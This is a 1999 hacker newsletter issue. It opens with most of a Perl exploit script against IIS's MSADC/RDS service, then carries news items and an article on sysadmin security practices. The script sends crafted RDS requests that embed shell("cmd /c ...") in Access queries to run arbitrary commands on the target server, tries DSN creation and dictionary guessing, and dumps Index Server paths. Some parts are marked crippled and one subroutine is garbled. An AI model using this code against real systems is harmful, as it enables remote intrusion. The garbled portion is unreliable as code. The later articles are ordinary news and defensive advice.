print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
&try_btcustmr;}

if (!defined $args{s} || $args{s}==2){
print "\nStep 2: Trying to make our own DSN...";
if (&make_dsn){ print "<<success>>\n"; sleep(3); } else { print "<<failed>>\n"; }}
# we need to sleep to let the server catchup

if (!defined $args{s} || $args{s}==3){
print "\nStep 3: Trying known DSNs...";
&known_dsn;}

#crippled

if (!defined $args{s} || $args{s}==5){
if (defined $args{u}){
print "\nStep 5: Trying UNC...";
&use_unc; } else { print "\nNo -u; Step 5 skipped.\n"; }}

if (!defined $args{s} || $args{s}==6){
if (defined $args{e}){
print "\nStep 6: Trying dictionary of DSN names...";
&dsn_dict; } else { print "\nNo -e; Step 6 skipped.\n"; }}

print "\n\nNo luck, guess you'll have to use a real hack, eh?\n";
exit;

##############################################################################

sub sendraw { # this saves the whole transaction anyway
 my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,80,$target)){
 open(OUT,">raw.out"); my @in;
 select(S); $|=1; print $pstr;
 while(<S>){ print OUT $_; push @in, $_;
 print STDOUT "." if(defined $args{X});}
 close(OUT); select(STDOUT); close(S); return @in;
 } else { die("Can't connect...\n"); }}

##############################################################################

sub make_header { # make the HTTP request
 my ($aa, $bb);
 if (defined $args{V}){ $aa="VbBusObj.VbBusObjCls.GetRecordset"; $bb="2"; }
 else { $aa="AdvancedDataFactory.Query"; $bb="3";}
#crippled
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=$bb

--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen
EOT
; $msadc=~s/\n/\r\n/g;
 return $msadc;}

##############################################################################

sub make_req { # make the RDS request
 my ($switch, $p1, $p2)=@_;
 my $req=""; my ($t1, $t2, $query, $dsn);

 if ($switch==1){ # this is the btcustmr.mdb query
  $query="Select * from Customers where City='|shell(\"$command\")|'";
  $dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
   $p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}

 elsif ($switch==2){ # this is general make table query
  $query="create table AZZ (B int, C varchar(10))";
  $dsn="$p1";}

 elsif ($switch==3){ # this is general exploit table query
  $query="select * from AZZ where C='|shell(\"$command\")|'";
  $dsn="$p1";}

 elsif ($switch==4){ # attempt to hork file info from index server
  $query="select path from scope()";
  $dsn="Provider=MSIDXS;";}

 elsif ($switch==5){ # bad query
  $query="select";
  $dsn="$p1";}

 elsif ($switch==6){ # this is table-independent query (new)
  $query="select * from MSysModules where name='|shell(\"$command\")|'";
  $dsn="$p1";}

 $t1= make_unicode($query);
 $t2= make_unicode($dsn);
 if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; }
 $req.= "\x08\x00" . pack ("S1", length($t1));
 $req.= "\x00\x00" . $t1 ;
 $req.= "\x08\x00" . pack ("S1", length($t2));
 $req.= "\x00\x00" . $t2 ;
 $req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n";
 return $req;}

##############################################################################

sub make_unicode { # quick little function to convert to unicode
 my ($in)=@_; my $out;
 for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
 return $out;}

##############################################################################

sub rdo_success { # checks for RDO return success (this is kludge)
 my (@in) = @_; my $base=content_start(@in);
 if($in[$base]=~/multipart\/mixed/){
  return 1 if( $in[$base+10]=~/^\x09\x00/ );}
 return 0;}

##############################################################################

sub make_dsn { # this (tries to) make a DSN for us
 print "\nMaking DSN: ";
 foreach $drive (@drives) {
  print "$drive: ";
  my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
   "Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq=" . $drive .
   "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
  $results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
  return 0 if $2 eq "404"; # not found/doesn't exist
  if($2 eq "200") {
   foreach $line (@results) {
    return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}}
 } return 0;}

##############################################################################

sub verify_exists {
 my ($page)=@_;
 my @results=sendraw("GET $page HTTP/1.0\n\n");
 return $results[0];}

##############################################################################

sub try_btcustmr {
 foreach $dir (@sysdirs) {
  print "$dir -> "; # fun status so you can see progress
  foreach $drive (@drives) {
   print "$drive: "; # ditto
   $reqlen=length( make_req(1,$drive,$dir) ) - 28;
   $reqlenlen=length( "$reqlen" );
   $clen= 206 + $reqlenlen + $reqlen;
   my @results=sendraw(make_header() . make_req(1,$drive,$dir));
   if (rdo_success(@results)){print "Success!\n";
    save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;");
    exit;}
   else { verbose(odbc_error(@results)); funky(@results);}}
  print "\n";}}

##############################################################################

sub odbc_error {
 my (@in)=@_;
 my $base = content_start(@in);
 if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
  $in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
  $in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
  $in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
  return $in[$base+4].$in[$base+5].$in[$base+6];}
 print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n";
 print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
  $in[$base+4] . $in[$base+5] . $in[$base+6];
 exit;}

##############################################################################

sub verbose {
 my ($in)=@_;
 return if !$verbose;
 print STDOUT "\n$in\n";}

##############################################################################

sub save {
 my ($p1)=@_; my $ropt="";
 open(OUT, ">rds.save") || print "Problem saving parameters...\n";
 if (defined $args{c}){ $ropt="c ";}
 if (defined $args{V}){ $ropt.="V ";}
 if (defined $args{w}){ $ropt.="w ";}
 print OUT "v2\n$ip\n$ropt\n$p1\n";
 close OUT;}

##############################################################################

sub load {
 my ($action)=@_; my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};";
 open(IN,"<rds.save") || die("Can't open rds.save\n");
 @p=<IN>; close(IN);
 die("Wrong rds.save version") if $p[0] ne "v2\n";
 $ip="$p[1]"; $ip=~s/\n//g;
 $target= inet_aton($ip) || die("inet_aton problems");
 print "Resuming to $ip ...";
 @switches=split(/ /,$p[2]);
 foreach $switch (@switches) { $args{$switch}="1";}
 if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
 print "Type the command line you want to run ($comm assumed):\n" . "$comm ";
 $in=<STDIN>; chomp $in;
 $command="$comm " . $in ;
 $torun="$p[3]"; $torun=~s/\n//g;
 if($torun=~/btcustmr/){ $args{'c'}="1";} # this is a kludge to make it work
 if($torun=~/^dbq/){ $torun=$drvst.$torun; }
 if(run_query("$torun")){ print "Success!\n";} else { print "failed\n"; }
 exit;}

##############################################################################

sub create_table {
 return 1 if (!defined $args{c});
 return 1 if (defined $args{V});
 my ($in)=@_;
 $reqlen=length( make_req(2,$in,"") ) - 28;
 $reqlenlen=length( "$reqlen" );
 $clen= 206 + $reqlenlen + $reqlen;
 my @results=sendraw(make_header() . make_req(2,$in,""));
 return 1 if rdo_success(@results);
 my $temp= odbc_error(@results); verbose($temp);
 return 1 if $temp=~/Table 'AZZ' already exists/;
 return 0;}

##############################################################################

sub known_dsn {
 foreach $dSn (@dsns) {
  print ".";
  next if (!is_access("DSN=$dSn"));
  if(create_table("DSN=$dSn")){
   if(run_query("DSN=$dSn")){
    print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}}
 print "\n";}

##############################################################################

sub is_access {
 my ($in)=@_;
 return 1 if (!defined $args{c});
 return 1 if (defined $args{V});
 $reqlen=length( make_req(5,$in,"") ) - 28;
 $reqlenlen=length( "$reqlen" );
 $clen= 206 + $reqlenlen + $reqlen;
 my @results=sendraw(make_header() . make_req(5,$in,""));
 my $temp= odbc_error(@results); verbose($temp);
 return 1 if ($temp=~/Microsoft Access/);
 return 0;}

##############################################################################

sub run_query {
 my ($in)=@_; my $req;
 if (defined $args{c}){$req=3;} else {$req=6;}
 $reqlen=length( make_req($req,$in,"") ) - 28;
 $reqlenlen=length( "$reqlen" );
 $clen= 206 + $reqlenlen + $reqlen;
 my @results=sendraw(make_header() . make_req($req,$in,""));
 return 1 if rdo_success(@results);
 my $temp= odbc_error(@results); verbose($temp);
 return 0;}

##############################################################################
#crippled
##############################################################################

sub hork_idx {
 print "\nAttempting to dump Index Server tables...\n";
 print " NOTE: Sometimes this takes a while, other times it stalls\n\n";
 $reqlen=length( make_req(4,"","") ) - 28;
 $reqlenlen=length( "$reqlen" );
 $clen= 206 + $reqlenlen + $reqlen;
 my @results=sendraw(make_header() . make_req(4,"",""));
 if (rdo_success(@results)){
  my $max=@results; my $c; my %d;
  for($c=19; $c<$max; $c++){
   $results[$c]=~s/\x00//g;
   $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
   $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
   $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
   $d{"$1$2"}="";}
  foreach $c (keys %d){ print "$c\n"; }
 } else {print "Index server not installed/query failed\n"; }}

##############################################################################

sub dsn_dict {
 open(IN, "<$args{e}") || die("Can't open external dictionary\n");
 while(<IN>){
  $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold";
  print ".";
  next if (!is_access("DSN=$dSn"));
  if(create_table("DSN=$dSn")){
   if(run_query("DSN=$dSn")){
    print "Success!\n"; save ("dsn=$dSn"); exit; }}}
 print "\n"; close(IN);}

##############################################################################

sub content_start { # this will take in the server headers
 my (@in)=@_; my $c;
 for ($c=1;$c<500;$c++) { # assume there's less than 500 headers
  if($in[$c] =~/^\x0d\x0a/){
   if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
   else { return $c+1; }}}
 return -1;} # it should never get here actually

##############################################################################

sub funky {
 my (@in)=@_; my $error=odbc_error(@in);
 if($error=~/ADO could not find the specified provider/){
  print "\nServer returned an ADO misconfiguration message\nAborting.\n";
  exit;}
 if($error=~/A Handler is required/){
  print "\nServer has custom handler filters (they most likely are patched)\n";
  exit;}
 if($error=~/specified Handler has denied Access/){
  print "\nADO handlers denied access (they most likely are patched)\n";
  exit;}
 if($error=~/server has denied access/){
  print "\nADO handlers denied access (they most likely are patched)\n";
  exit;}}

##############################################################################
#crippled
##############################################################################

sub use_unc {
 $uncpath=$args{u};
 $driverline="driver={Microsoft Access Driver (*.mdb)};dbq=";
 if($uncpath!~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){
  print "Your UNC path sucks. You need the following format:\n".
   "\\\\server(ip preferable)\\share\\some-file.mdb\n\n";
  exit; }
 if(create_table($driverline.$uncpath)){
  if(run_query($driverline.$uncpath)){
   print "Success!\n"; save ("dbq=".$uncpath); exit;}}
}

##############################################################################

sub get_name { # this was added last minute
 # (the request body of this sub is not present in this copy)
 my $msadc=<.,?]//g;
 print "Machine name: $results[$base+6]\n";}

##############################################################################

# special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm,
# #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and
# good friends!), wiretrip, l0pht, nmrc & all of phrack
#
# thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice
#
# I wish I could really name everyone, but I can't. Don't feel slighted if
# your not on the list... :)

##############################################################################

@HWA

06.0 Online encrypted privacy for email and WWW
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Submitted by: Ed
URL: https://ca.privacyx.com/

The PrivacyX website is an anonymous and encrypted web-based email system that allows you to send encrypted anonymous email through their POP3 servers. You will have to accept a signed certificate from their site and install it on your system; the site currently only offers 512-bit keys, presumably to keep the international nature of the site open. Once you have edited your config to use the mail.privacyx.com servers you are ready to send and receive email using the service.

A test email sent an hour ago still has not arrived as of yet; I'll update when (if) it comes through.
@HWA

07.0 More on the Chris Buckley Saga
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Abattis

From http://www.theregister.co.uk/991119-000003.html

Posted 19/11/99 11:56am by Linda Harrison

0800 court case adjourned...

Chris Buckley, the teenager accused of using a BT 0800 number to access the Web without permission, yesterday had his case adjourned to December.

The 18-year-old had his appearance at Corby Magistrates Court, Northamptonshire, put back to December 3 to enable his solicitor to take instructions.

Buckley, from Oundle, Northamptonshire, allegedly used a BT freephone number to access the Net without authorisation or permission. He faces three charges: gaining unauthorised access to the Internet; posting material on newsgroups that may have caused "an annoyance"; and using profanities.

-=-

Posted 18/05/99 11:44am by Tim Richardson

Fraud charges follow abuse of BT 0800 test number

An anonymous Net user has been accused of fraud and threatened with legal action for using a toll-free number to access the Web that was reserved for use by BT staff.

A letter, purportedly sent by BT customer relations manager Keith Lawton, orders the unnamed customer to cough up for the 680 hours and 45 minutes spent online illegally -- or face legal action.

The letter also warns the crafty BT customer that if he/she does it again, the police will be called "with a view to criminal charges being brought".

Having already issued a warning to stop using the number, Lawton wrote: "By continuing to use that freephone number you have committed fraud against us."

"As you have knowingly used our internal ISP without our express authorisation, we are billing you for all the time that you have been online using our freephone number by converting all time spent online to a national number," Lawton wrote.

There is no indication exactly how much the bill is for but it could run into many hundreds of pounds.

A spokesman for BT said the company would not comment on an individual customer's bill and also questioned the validity of the letter. It could be genuine, or it could be a hoax, he said.

Since no one is prepared to say one way or the other, The Register has decided to let its readers decide whether it's kosher or not.

Check out the letter here: http://www.angelfire.com/ar/bt0800/

-=-

Posted 19/05/99 11:44am by Tim Richardson

BT fraud letter outed as a fake

The letter accusing a BT customer of fraud is bogus, according to a learned reader of The Register.

Matthew Garrett, a medical student at Cambridge University, said: "The alleged letter from BT is a fake.

"Putting it through a colour filter reveals that the BT logo in the top left corner and the bar code and footer have been scanned in and pasted on top of a computer-generated document.

"Creases are also clearly visible around the staple region, but oddly enough aren't anywhere else on the page.

"And as a final nail in its coffin, the background of the main page is full red, green and blue, a value that is highly unlikely to occur in nature since paper tends to be slightly off-white.

"The rest of the page is plain and perfect white, which would only occur in a computer-generated image.

"Hence it is fake.

"If anyone can produce that with a scanner and a perfectly ordinary sheet of paper, I'd be greatly impressed.

"My version of it is here, and I know there's some other enhanced copies floating around," he said.

http://www-jcsu.jesus.cam.ac.uk/~mjg59/0800.jpg

To see yesterday's story about the alleged fake letter, click here.

After his thorough job on this little number it looks like Matthew will have no problems sailing through his post mortem course.

-=-

Non-related story:

Posted 12/11/99 3:41pm by Tim Richardson

22,000 people and the 08004u security lapse

It seems the 22,000 or so people who gained totally toll-free access to the Net earlier this week courtesy of Scottish ISP, 08004u, didn't even have to blag their way past password security.

That's because there was no security. It simply didn't exist.

Any login ID and password would have got them into 08004u's network and onto the Web, The Register has learned.

According to some of those who took advantage of the Scottish ISP's generosity, 08004u just left the doors wide open allowing anyone to walk in completely uncontested.

"I could dial their 0800 number, and have the login IAMCOOL and password ANYTHING, and it would work," wrote one Net user who asked to remain anonymous.

"I find this to be an insult to the people that are paying their £50 a month [for unmetered access]," he said, revealing he was one of 08004u's subscribers.

It'll be interesting to know how 08004u is planning to pay for this charity... after all, there's no such thing as a free lunch.

@HWA

08.0 Security Practices Today, Or Lack Thereof
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Erik

A new article in the Buffer Overflow section illustrates what system administrators are doing these days in the way of security. You may be surprised, or not, at what some administrators consider to be secure computing practices.

Buffer Overflow
http://www.hackernews.com/orig/buffero.html

Security practices today. Or lack thereof
By: Erik Parker - Bio
Mind Security

Companies are not giving computer security the attention that it needs. I have interviewed several System Administrators and Security Administrators. What I found was what I had expected, that things just aren't getting done the way they should be.

Most companies that have over 100 employees have their own computer operations staff.
Unix Administrators, NT Administrators, Novell Administrators, etc., of course all depending on the individual network. Companies that are computer companies, making software, doing internet business, or depend on every single user using their computer usually have larger network staffs, makes sense right? All too often network security is not a concern on these smaller networks. Even more sad than that, all too often it isn't a concern on larger networks. Networks with thousands of users, and a fulltime staff of administrators, or companies who have permanent in house contractors.

"Network Security" is left up to the Administrators. That isn't so bad if your administrators happen to be security specialists. However, most of the time that isn't the case. Companies expect their network to be secure, or just don't expect. Many places don't have policies, or have a plan to someday start one, but don't want to bother until it becomes a problem, after they have been hacked, or inside info starts leaking out, and the SEC is coming down their throat.

We interviewed 7 Unix Administrators, and 3 NT Administrators. We didn't gain any worthwhile knowledge from the NT Administrators, as none of them knew about security or were concerned with it. If I had more time, I could have interviewed some that dealt with their own firewalls and all the network security. So from here on out, I will refer to only Unix Admins.

All of the Unix Admins we interviewed were in charge of keeping their machines secure. Some were in charge of their firewall, some weren't. The most common security practice was simply shutting down services that weren't needed. End of story. In other cases the Admins would keep lists of patch levels, and every couple of months go out and check for new versions of the daemons they were running. Many of them didn't know how to search their machines for SUID binaries, and couldn't understand why it would matter.

Several others claimed that they didn't bother to shut down services, because the firewall blocked all incoming connections to those machines except on specific ports, like SMTP and HTTP. When I asked those Admins if they were in control of their entire network, some were, and some weren't. The ones who weren't claimed to know that there were other points of entry into the network besides the firewall that controls direct access to their specific server cluster.

I asked a specific set of questions to each person; I never went on to ask questions to counter their responses. Mainly because if I had, I would have been teaching them security, and putting thoughts into their head. Well, that is why this article is being written.

I was surprised to hear a few administrators tell me that they didn't worry about security breaches, because there was nothing on their network that hackers or crackers would care about. I guess I had to chuckle about that. There doesn't have to be top-secret files, some new operating system, or something that is plainly obvious. Most of the hacks and cracks that you hear about are done for web page changes. That seems to be what is in the media most often. Many hacks go unreported as well, for reasons of the stock market, embarrassment, and several Admins won't even admit to their own boss after finding out about the hack, as they think it will be thought of as their fault. Which, unless they are the security admin, and properly trained in it, it shouldn't be their fault.

Companies often hire Security Penetration engineers, or if you will, strike teams, to break into their network, and test security. From outside or inside. Sometimes they don't bother to give these teams user level access, which is very stupid, since regular users could be the very problem. Also quite often a machine will be compromised via a daemon that isn't running as root, only granting the hacker the daemon's user level access, and from that they can gain root access from local exploits, the same local exploits some companies never have the strike teams check for.

Some of the Security Administrators I spoke to gave me a quick rundown of what they do to secure a network. Their quick list was to set up a firewall and only allow the access that was needed. I won't go into detail about proper firewall rules and such; I don't want to get that technical here. They also said they would remove utilities that aren't going to be used on the servers. For instance, an Ultra 5 with Solaris 7 on it, that has one function, to run Apache and serve web pages all day, and do nothing else. Does it need the capability to print? Does it need OpenWindows or CDE installed? No. These Admins would remove packages not needed, and other ones that aren't in use by the system. Others that may be used by the Admins at some point, and are Set UID root, get their sticky bit removed. Users don't need root level access to most of these. On most systems, if you would like to see all of the files on it that are SUID root, issue this command:

`find / \( -perm -4000 -o -perm -2000 ! -type d \) -exec ls -ldb {} \; >> output.log`

The other things the Admins said they would do are to keep up to date on all of the patches, and actively keep up with their software. I personally get on the maker of the software's mailing list, development lists, and user list. This makes for a pretty busy procmail, but you will catch things early on.

Other things Security Admins do are to secure every machine, and any machine they aren't in control of they don't trust from anywhere on their network. They of course shut off all services not needed, like 98% of what is in /etc/inetd.conf. Any daemon that will run properly chrooted to its own directory gets set that way. Any program that can run as a non-privileged user gets set that way. There is more that a dedicated Security Administrator does, but there is just too much to go through.

Keep in mind that you should never install software from binary distributions if possible. With source you read the source if you wish, and compile without the extra options you may not need. Often exploits for programs are in features in the software that you didn't really need, but got compiled in by default.

Something I am not touching on too much, but intrusion detection can be a good way to go as well. There are many types of software and even hardware that does it. You can monitor your systems for attacks, attempts, or full-blown break-ins. There is a software called "Anti-Sniff", that is just that... It is a sniffer detector. If one of your machines is compromised, and someone is sniffing your network for passwords, data, or some other information, this will detect it. You can find Anti-Sniff at http://www.l0pht.com/antisniff/.

We also recommend for networks with more than a couple machines, setting up a dedicated log host. This machine serves ONE function, and one alone, to log. You set up all your remote machines to have their syslog piped off to this machine. It doesn't need to be a huge box, or an expensive box. I have used a 486-100, running Linux on it, and had 35 servers logging to it. Put a 20 gig drive in it, and have it compress logs every so often. Works like a dream. If you use a big server for it, you will often find your management having this "Great Idea" to use it to run other services as well. I personally have been asked before to make our loghost the ssh gateway from the outside; I hope you can see the problems in that yourself.
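The SUID/SGID search above is only useful if you run it regularly and notice what changed. As an added example (not part of the HNN article), the script below wraps that find command into an inventory function and diffs the result against a saved baseline, so a privileged binary that appeared since the last run stands out; it assumes a POSIX sh with find, ls, awk, sort, comm and mktemp.

```shell
#!/bin/sh
# Added example, not from the article: inventory setuid/setgid files under a
# tree and compare against a saved baseline, so drift in privileged binaries
# is visible. Assumes POSIX sh with find, ls, awk, sort, comm, cmp and mktemp.

# Print "mode owner group path" for every setuid or setgid non-directory
# under $1, sorted so the output is stable and comm(1) can compare it.
suid_inventory() {
  find "$1" \( -perm -4000 -o -perm -2000 \) ! -type d -exec ls -ld {} \; 2>/dev/null \
    | awk '{ print $1, $3, $4, $NF }' \
    | sort
}

# Save the current inventory of the tree $2 as the baseline file $1.
suid_baseline() {
  suid_inventory "$2" > "$1"
}

# Compare the tree $2 against the baseline $1.  Prints "+ entry" for
# privileged files that are new and "- entry" for ones that vanished.
# Returns 0 when nothing changed, 1 on drift, 2 if a temp file cannot be made.
suid_diff() {
  base=$1; root=$2
  now=$(mktemp) || return 2
  suid_inventory "$root" > "$now"
  if cmp -s "$base" "$now"; then
    rm -f "$now"
    return 0
  fi
  # comm needs sorted input; both files come from suid_inventory, so they are.
  comm -13 "$base" "$now" | sed 's/^/+ /'   # only in the current inventory
  comm -23 "$base" "$now" | sed 's/^/- /'   # only in the baseline
  rm -f "$now"
  return 1
}
```

Run suid_baseline once on a freshly built host and suid_diff from cron afterwards; a "+" line naming a binary nobody installed on purpose is exactly the kind of thing the article says most admins never look for.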
Something else that is difficult for companies to understand and put up with, and many don't, and end up suffering because of it, are the fact that many skilled Administrators spend a lot of time associating them selves with what would be classified by the media and the US government as Black hat hackers. However, they are the very people we are protecting networks against, and they often get information before we do. They are often a great resource for information, and even for tips when you have questions. You have to know both sides to be successful. We aren't hurting them any by securing the networks. There will always be networks out there that aren't secure. It also gives them more of a challenge in life, which is often something they consider fun. I personally don't believe in the labeling of White hats or Black hats, as many people who are considered to be black hats, go to work every day in a suit and tie, get paid 150k a year, and are the best security administrators there are. There isn't a ton like that, but some of them are batting for both teams. What would that make them, gray hats? There is a bigger problem that exists. It is what we call Upper Management. You know, the person who signs your purchase orders, gives you your paycheck, and the same person who never thinks about security. It costs money, and that is bad. They think because they don't see a problem, don't fix. What stupid logic that is. You won't ever see a skilled hacker, as they will come in, get what they want, and disappear and perhaps never run across your network again. I think it is much better to have a cracker hit a site, than a hacker. I'd much rather have a server erased, or a web page changed, than to have a hacker come in, and rip off software, or documents, or project plans that my company has been working on for years, and sell it to competitors, or post them on some stock board, and make my company's stock fall 50%. Upper management doesn't care about that. 
They either don't understand what security is, or just don't think it could happen to them. The problem is, you will rarely, most likely never look like a hero at your company. If you do get the go ahead to do serious security work, hire an outsider, or hire a fulltime security admin, and they do a good job, you won't get hacked. Life goes on as it was, and it seems like a waste of money. Your boss doesn't lose sleep at night thinking about how insecure your network is, but you might, since it is your fault either way if it gets hacked. If you don't implement security, then you are certainly not shown off as a hero, unless you track him down, file suit, and he happens to be rich, and your company makes a boatload of money. Not likely going to happen, once its reported to the FBI, and they do their research, and maybe even raid someone, its years later, and you have moved on to a new company. You have to think up every single problem on the network, what could happen, and show it to your boss. Make a chart, show problems, and show costs. In most cases the cost of cleanup, and potential loss of money, is far more than hiring a security staff. Some Upper Management understand more clearly if you put it simply, such as "Do you get the oil in your Porsche changed from every three to five months? Even though nothing was wrong?". Most likely they do, or at least know that they SHOULD. That is a fact, that keep up the maintenance schedule, and you have less problems. Well, same way with computers. It is difficult in most companies, very difficult. Even worse if you are working for the government, since every penny has to be cleared, and it takes time. Most of the time you either end up doing it and never getting recognized, or paid. If you don't have the time, well, that would explain why you see so many government cracks listed on web page defacement sites like attrition.org. It is a difficult job, and if you work for a consulting company, you are in luck. 
It most likely isn't your job to sell the audits, you just do them for the company who was convinced that they needed it. You do have a harder job though, and that is writing up a security policy, and making the company understand they MUST follow it. Many just want their network locked down, and don't are about a policy. If you only care about the money, so be it. If you care about doing the best job you can, getting the security done right, you need to make them understand they have to make your security policy, well, policy. Security today, and in the past, just isn't what it needs to be. Most companies consider it to be a pain, and an expense that isn't needed or justified. Companies need to focus on the area, and big companies need to hire a fulltime security admin, or keep an open account with a contractor for routine security audits, and have their administrators trained on keeping up to date on things. All companies should have someone who monitors mailing lists like Bugtraq, or NT Bugtraq, depending on what platforms you are running. Things need to change, and if you are in a position where you can do that, I suggest you do it right now. If you firmly believe in the future of the Internet, and E-commerce, I also know that if I were the only person buying things on-line, every e-commerce site would shut down, because I just can't afford to keep them all going. I've talked to a couple of people who say they won't buy anything online. They don't think their credit cards are secure, or their personal information. People are scared of it, and they keep hearing about hackers, and all these evil things going on that they don't understand. Many web sites try to comfort people, by explaining the encryption method for the browsers, and leave it at that. 
For the people who have been living under rocks, and have only heard about credit card stealing, and not about hacking and computers being compromised, or for the people who just don't understand what that means, they think that their data being encrypted on the way to the site is all there is to it. Many people don't realize that when hackers get credit card numbers, they usually get them in bulk, rarely from sniffing, but from compromising the machine that holds the plain text files or databases containing the information.

@HWA

09.0 Internet Wiretapping Still a Possibility
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Brian Oblivion

While approximately fifty-five percent of the Internet Engineering Task Force voted against a measure to include wiretapping capabilities in new protocols, there was not a high enough objection to close the issue permanently. The director of the transport area of the IETF said that unless the proposal receives a much stronger objection, the possibility of including these features still exists.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2392616,00.html?chkpt=zdnnstop

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Internet wiretapping still a threat
By Robert Lemos, ZDNN
November 11, 1999 5:24 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2392616,00.html

A push by law enforcement to make the Internet wiretap-friendly hit a major snag on Wednesday, when members of the Internet Engineering Task Force -- the body responsible for setting Internet standards -- overwhelmingly said 'no' to a key question.

The question: Should the IETF put features in forthcoming protocols whose sole purpose is to facilitate wiretapping?
Scott Bradner, director of the Transport Area of the IETF -- where the motion was originally proposed -- estimates that 55 percent of the members answered 'no,' another 15 percent said 'yes,' and the rest abstained.

Not resolved

While that may seem definitive, Bradner stressed that the issue remains open.

"The IETF doesn't vote; we work on rough consensus," said Bradner, who stressed that without a large majority -- say, 80 percent -- of its members voting one way, the issue would not be resolved.

"After the meeting, we are still in somewhat of an ambiguous area," he said. "There is clearly not strong support for doing it, but there is not strong enough support to definitively block wiretapping from future standards."

That leaves the issue tabled for the moment, but certain to be brought up again.

"This is just the beginning," said Jim Dempsey, senior staff counsel with the policy think tank Center for Democracy and Technology, who attended the meeting. "The vote was about 10 to 1 against, but that won't stop it."

Expanding wire-tapping

The whole Internet wiretapping concept is a direct result of the Communications Assistance for Law Enforcement Act of 1994, which requires telecommunications companies to aid law enforcement in legally obtained wiretaps by making their network infrastructure wiretap-friendly.

For the past two years, law enforcement officials have been lobbying Congress and putting pressure on cellular phone companies to apply the law to their phone network as well. The Internet is the next communications network on the list.

"If it is a one or a zero, or an analog signal, the government is entitled to intercept the signal," said CDT's Dempsey. "But does that mean they can force companies to design their systems to make it easy to get the signals they want, when they want it? That's the CALEA question."

Privacy advocates such as the Electronic Privacy Information Center spoke out adamantly against a pro-wiretapping Internet.

"...
We believe that such a development would harm network security, result in more illegal activities, diminish users' privacy, stifle innovation, and impose significant costs on developers of communications," wrote EPIC in an open letter to the IETF. "At the same time, it is likely that Internet surveillance protocols would provide little or no real benefit for law enforcement."

Fear of hacking

The IETF answered more out of security concerns than any thoughts about privacy, said Bradner.

"If you put in some mechanism where someone with legal authority can tap your telephone, what stops some hacker from doing that?" he asked.

The FBI could not be reached for comment on the issue.

In any event, the whole debate may be moot. The vote just barred specific development of features solely for wiretapping, but other pieces already present in the Internet could be used to create an effective wiretap.

"Some people think that all the functions necessary to do an intercept may already be in the protocol for other reasons," said Bradner.

For example, the Internet allows servers to do accounting: finding out where a packet came from and where it is going. In wiretapping, such a feature is called a pen register and is considered the first step in narrowing down the calls that need to be tapped.

CDT's Dempsey believes the vote may be moot for a different reason.

"Two thousand engineers get in a ballroom and raise their hands -- that means nothing to the government," he said. "What it DOES mean is that they will have to go to the CEOs ... and make their case."

@HWA

10.0 Stock Prices Manipulated in China
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne

Zhao Zhe, 28 and a former trust firm employee, received three years of jail time from a Chinese court and was ordered to pay restitution for breaking into a computerized trading system and manipulating stock data. This allowed the pair to sell shares at higher prices.
CNNfn
http://www.cnnfn.com/1999/11/12/emerging_markets/wires/china_hacker_wg/

Wired
http://www.wired.com/news/reuters/0,1349,32512,00.html

Nando Times
http://www.techserver.com/noframes/story/0,2294,500057111-500094072-500360224-0,00.html

CNNfn

Chinese hacker jailed
Former trust firm staffer found guilty of hacking into stock system
November 12, 1999: 10:24 a.m. ET

SHANGHAI (Reuters) - A Chinese court jailed a former trust firm worker for three years Friday for hacking into a computerized stock trading system and manipulating prices, a court official said.

The Shanghai court found Zhao Zhe, 28, guilty of rigging stock data so that he could sell shares at inflated prices, he said.

Zhao, a forme